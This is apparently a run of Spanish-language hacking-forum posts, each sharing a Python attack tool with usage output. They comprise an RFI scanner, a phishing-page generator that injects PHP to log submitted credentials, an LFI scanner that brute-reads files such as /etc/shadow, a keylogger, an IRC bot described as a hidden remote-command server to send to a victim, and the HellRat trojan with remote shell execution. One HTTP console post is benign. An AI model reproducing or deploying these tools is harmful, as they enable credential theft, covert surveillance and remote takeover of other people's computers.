Hola a todos. Acabo de hacer un simple verificador de vulnerabilidad RFI #!usr/bin/python #RFI Tester (C) Doddy Hackman import os,sys,urllib2,re def header() : print "\n--== RFI Tester ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : return urllib2.urlopen(web).read() def test(web): try: print "\n[+] Testing vulnerability RFI in",web code = toma(web+"http://www.supertangas.com") if(re.findall("Los mejores TANGAS de la red",code,re.I)): print "[+] RFI Detected" else: print "[-] RFI Not Found" except: pass header() if len(sys.argv) != 2 : show() else : test(sys.argv[1]) copyright() #The End
Ejemplo de uso: python rfi.py http://127.0.0.1/rfi.php?index=
C:\Users\DoddyH\Desktop\Arsenal X parte 2>rfi.py http://127.0.0.1/rfi.php?index=
--== RFI Tester ==--
[+] Testing vulnerability RFI in http://127.0.0.1/rfi.php?index=
[+] RFI Detected
(C) Doddy Hackman 2010
Programación / Scripting / [Python] Phising Gen By Doddy H
en: 7 Octubre 2011, 01:39 am
Hola a todos Acabo de terminar esta tool en python para generar los fakes o phising (si es que asi se escribe) No me dedico mucho a esa parte del hacking , pero hice esta cosa rara porque no tenia nada que hacer xDD. #!usr/bin/python #Phising Gen (C) Doddy Hackman import urllib2,sys,os def savefile(filename,text): file = open(filename,"w") file.write(text) def header() : print "\n\n--== Phising Gen ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web> <filename>\n" def toma(web) : return urllib2.urlopen(web).read() def gen(web,new): try: print "\n[+] Working in the phishing" code = toma(web) text ='<?php $file = fopen("dump.txt", "a");foreach($_POST as $uno => $dos) {fwrite($file, $uno."=".$dos."\r\n");}foreach($_GET as $tres => $cuatro) {fwrite($file, $tres."=".$cuatro."\r\n");}fclose($file);?>' print "[+] The fake was save in",new savefile(new,code+"\n\n"+text) except: pass header() if len(sys.argv) != 3 : show() else : gen(sys.argv[1],sys.argv[2]) copyright() #The End
Ejemplo de uso:
C:/Users/DoddyH/Desktop/Arsenal X parte 2>phising.py http://127.0.0.1/login.php yeah.php
--== Phising Gen ==--
[+] Working in the phishing
[+] The fake was save in yeah.php
(C) Doddy Hackman 2010
Programación / Scripting / [Python] LFI T00l
en: 7 Octubre 2011, 01:38 am
Hola a todos. Acabo de terminar una tool para testear una vulnerabilidad LFI , si la pagina es vulnerable entonces el script automaticamente intenta brutear archivos. #!usr/bin/perl #LFI T00l (C) Doddy Hackman import os,sys,urllib2,re files = ['../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_l
og','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc'] def header() : print "\n--== LFI T00l ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : return urllib2.urlopen(web).read() def fuzz(web): print "\n[+] Fuzzing files...\n" for file in files: code = toma(web+file) if not (re.findall("No such file or directory in",code)): print "[File Found] : ",web,file def test(web): try: print "\n[+] Testing vulnerability LFI in",web code = toma(web+"'") if(re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I)): fpd = re.findall("No such file or directory in <b>(.*?)<\/b> on line",code,re.I) print "\n[+] LFI Detected" print "[+] 
Full Path discloure : ",fpd[0] fuzz(web) else: print "[-] LFI Not Found" except: pass header() if len(sys.argv) != 2 : show() else : test(sys.argv[1]) copyright() #The End
Ejemplo de uso: python lfi.py http://127.0.0.1/lfi.php?file=
C:\Users\DoddyH\Desktop\Arsenal X parte 2>lfi.py http://127.0.0.1/lfi.php?file=
--== LFI T00l ==--
[+] Testing vulnerability LFI in http://127.0.0.1/lfi.php?file=
[+] LFI Detected [+] Full Path discloure : C:\xampp\htdocs\lfi.php
[+] Fuzzing files...
(C) Doddy Hackman 2010
Programación / Scripting / [Python] Simple Keylogger
en: 7 Octubre 2011, 01:38 am
Un simple keylogger en Python #!usr/bin/python #Simple Keylogger in Python #(C) Doddy Hackman 2011 import pyHook,pythoncom def savefile(name,text): file = open(name,"a") file.write(text+"\n") file.close() def toma(frase): savefile("logs.txt",frase.Key) def capturar(): nave = pyHook.HookManager() nave.KeyDown = toma nave.HookKeyboard() pythoncom.PumpMessages() while 1: capturar() # The End
Programación / Scripting / [Python] IRC Bot
en: 7 Octubre 2011, 01:37 am
Hola a todos. Aca les traigo un IRC Bot en Python para poder usar como servidor oculto y mandarselo a una victima para poder controlarla desde un comando canal IRC El comando clave para mandar comandos que despues se muestra el resultado de comando en el chat es #!usr/bin/python #Insane Bot (C) Doddy Hackman 2011 #Version beta 0.00001 import re,socket import subprocess host = "127.0.0.1" canal = "#locos" nick = "bot" irc = socket.socket() try: irc.connect((host,6667)) irc.send("NICK "+nick+"\r\n") irc.send("USER "+nick+" 1 1 1 1\r\n") irc.send("JOIN "+canal+"\r\n") print "[+] Insane Bot Online\n" while 1: code = irc.recv(9999) if re.findall("PING",code): irc.send("PONG "+code.split()[1]+"\r\n") if re.findall("PRIVMSG",code): nick = code.split("!") nick = nick[0].replace(":","") msg = code.split(":")[2:][0] if re.findall("cmdnow",code): cmd = code.split("cmdnow")[1] irc.send("PRIVMSG "+canal+" : [+] Loading command : "+cmd+"\n") rea = subprocess.Popen(cmd,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE) if rea: re1 = rea.stdout.read() total = re1.replace("\n","|") irc.send("PRIVMSG "+canal+" : "+total+"\n") else: re2 = rea.stderr.read() total = re2.replace("\n","|") irc.send("PRIVMSG "+canal+" : "+total+"\n") except: print "\n\n[-] Error\n\n" # The End
Programación / Scripting / [Python] HTTP Console By Doddy H
en: 7 Octubre 2011, 01:37 am
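#!/usr/bin/python
#Console (C) Doddy Hackman 2011
#
# A simple Tk program in Python that sends web requests to a given server.
#
# The text typed in "Command" is sent, followed by one CRLF, to TCP port 80
# of the host typed in "Host"; repr() of up to 666 bytes of the reply is
# appended to the text panel.
#
# NOTE(review): the connection is plaintext on port 80 only (no TLS), and a
# single trailing CRLF does not terminate an HTTP/1.x header block, so most
# servers will only answer HTTP/0.9-style request lines -- confirm intent.
# The reply is shown through repr(), so control bytes sent by the server are
# displayed escaped rather than rendered.

from Tkinter import *
import socket

# Upper bound, in seconds, for connect/send/recv so an unresponsive host
# cannot freeze the Tk event loop forever (execa runs on the GUI thread).
SOCKET_TIMEOUT = 10


def execa():
    """Send the "Command" text to port 80 of "Host" and show the reply.

    Reads the module-level StringVars `host` and `cmd`, and writes to the
    module-level Text widget `panel`. Network errors are reported in the
    panel instead of being raised inside the Tk callback, and the socket is
    always closed.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.settimeout(SOCKET_TIMEOUT)
        s.connect((str(host.get()), 80))
        # sendall() retries until the whole request is written; send() may
        # transmit only part of it.
        s.sendall(cmd.get() + "\r\n")
        data = s.recv(666)
    except socket.error as err:
        panel.insert(END, "[-] Error : " + str(err) + "\n")
        return
    finally:
        # Release the descriptor on every path, including failures.
        s.close()
    panel.insert(END, repr(data))


window = Tk()
window.title("HTTP Console (C) Doddy Hackman 2011")
# Fixed-size window: minimum and maximum are the same 400x350.
window.maxsize(width="400", height="350")
window.minsize(width="400", height="350")
window.configure(background="black")
window.configure(cursor="tcross")

host = StringVar()
cmd = StringVar()

panel = Text(window, width=30, height=15, bg="black", fg="red")

Label(window, bg="black").grid(row=3)
Label(window, text="Host : ", bg="black", fg="red").grid(row=4, column=4)
# .grid() returns None, so the widgets are not bound to a name here.
Entry(window, width=35, textvariable=host, bg="black", fg="red").grid(row=4, column=5)
Label(window, text="Command : ", bg="black", fg="red").grid(row=8, column=4)
Entry(window, width=35, textvariable=cmd, bg="black", fg="red").grid(row=8, column=5)
Button(text="Cargar", bg="black", fg="red", activebackground="red", command=execa).grid(row=8, column=9)
Label(window, bg="black").grid(row=19)
panel.grid(row=20, column=5)

window.mainloop()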
Programación / Scripting / [Python] HellRat By Doddy H
en: 7 Octubre 2011, 01:37 am
Hola, acá traigo un troyano en Python con las siguientes opciones:
- Ocultar inicio
- Mostrar inicio
- Ocultar barra de tareas
- Mostrar barra de tareas
- Abrir CD
- Cerrar CD
- Ejecutar comandos
- Mostrar informacion
server.py #!usr/bin/python #Hell RAt (C) Doddy Hackman 2011 import socket,os,re,win32api,win32gui,win32con,ctypes,subprocess print "\n\n[+] Online\n\n" slave = socket.socket() slave.bind(("",666)) slave.listen(999) a,b = slave.accept() while True: rex = a.recv(20) if re.findall("getso",rex): z = os.name a.send(z) if re.findall("getpath",rex): h = os.getcwd() a.send(h) if re.findall("ocultarinicio",rex): x = win32gui.FindWindow("Shell_TrayWnd","") win32gui.ShowWindow(x,win32con.SW_HIDE) elif re.findall("mostrarinicio",rex): x = win32gui.FindWindow("Shell_TrayWnd","") win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL) elif re.findall("ocultaricono",rex): x = win32gui.FindWindow(0,"Program Manager") win32gui.ShowWindow(x,win32con.SW_HIDE) elif re.findall("mostraricono",rex): x = win32gui.FindWindow(0,"Program Manager") win32gui.ShowWindow(x,win32con.SW_SHOWNORMAL) elif re.findall("abrircd",rex): ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door open", None, 0, None) elif re.findall("cerrarcd",rex): ctypes.windll.WINMM.mciSendStringW(u"set cdaudio door closed", None, 0, None) else: rea = subprocess.Popen(rex,shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.PIPE) if re: a.send(rea.stdout.read()) else: a.send(rea.stderr.read()) # The End
cliente.py #!usr/bin/python #HellRat (C) Doddy Hackman 2011 import os,socket,sys def head(): print "\n\n-- == hELLrAT == --\n\n" def copyright(): print "\n\n(C) Doddy Hackman 2011\n\n" def clean(): if sys.platform=="win32": os.system("cls") else: os.system("clear") def men(): try: ip = raw_input("[+] IP : ") client = socket.socket() client.connect((ip,666)) while True: clean() print "\n\n[+] Welcome to ",ip,"\n\n" print "\n\n[1] Informacion" print "[2] CMD" print "[3] Abrir CD" print "[4] Cerrar CD" print "[5] Ocultar iconos" print "[6] Mostrar iconos" print "[7] Ocultar barra de tareas" print "[8] Mostrar barra de tareas" print "[9] Cambiar IP" print "[10] Salir" op = input("\n\n[Opcion] : ") if op == 1: print "\n\n[+] Informacion\n\n" client.send("getso") so = client.recv(999) client.send("getpath") path = client.recv(999) print "[+] SO : "+so print "[+] Path : "+path raw_input() if op == 2: cmd = raw_input("\n[CMD] : ") client.send(cmd) code = client.recv(999) print code raw_input() if op == 3: client.send("abrircd") if op == 4: client.send("cerrarcd") if op == 5: client.send("ocultaricono") if op == 6: client.send("mostraricono") if op == 7: client.send("ocultarinicio") if op == 8: client.send("mostrarinicio") if op == 9: men() if op == 10: client.close() copyright() raw_input() sys.exit(1) except: print "\n\n[-] Error\n\n" head() men() # The End